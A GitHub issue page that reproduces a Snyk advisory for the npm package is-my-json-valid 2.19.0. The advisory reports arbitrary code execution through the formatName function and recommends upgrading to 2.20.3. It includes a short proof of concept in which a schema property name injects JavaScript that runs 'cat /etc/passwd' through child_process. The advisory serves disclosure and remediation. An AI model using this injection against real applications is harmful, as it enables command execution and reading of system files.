We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Package Name: is-my-json-valid Package Version: ['2.19.0'] Package Manager: npm Target File: package.json Severity Level: high Snyk ID: SNYK-JS-ISMYJSONVALID-597167 Snyk CVE: No CVE Snyk CWE: CWE-94 Link to issue in Snyk: https://app.snyk.io/org/cse_rhicksiii91/project/14f822de-b806-4bd7-9ad2-767a7feebe1d Snyk Description: ## Overview is-my-json-valid is a JSONSchema / orderly validator that uses code generation to be extremely fast.
Affected versions of this package are vulnerable to Arbitrary Code Execution via the formatName function.
formatName
##PoC
const schema = { type: 'object', properties: { 'x[console.log(process.mainModule.require(`child_process`).execSync(`cat /etc/passwd`).toString(`utf-8`))]': { required: true, type:'string' } }, } var validate = validator(schema); validate({})
Upgrade is-my-json-valid to version 2.20.3 or higher.
is-my-json-valid
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Package Name: is-my-json-valid
Package Version: ['2.19.0']
Package Manager: npm
Target File: package.json
Severity Level: high
Snyk ID: SNYK-JS-ISMYJSONVALID-597167
Snyk CVE: No CVE
Snyk CWE: CWE-94
Link to issue in Snyk: https://app.snyk.io/org/cse_rhicksiii91/project/14f822de-b806-4bd7-9ad2-767a7feebe1d
Snyk Description: ## Overview
is-my-json-valid is a JSONSchema / orderly validator that uses code generation to be extremely fast.
Affected versions of this package are vulnerable to Arbitrary Code Execution via the
formatName
function.##PoC
Remediation
Upgrade
is-my-json-valid
to version 2.20.3 or higher.References
The text was updated successfully, but these errors were encountered: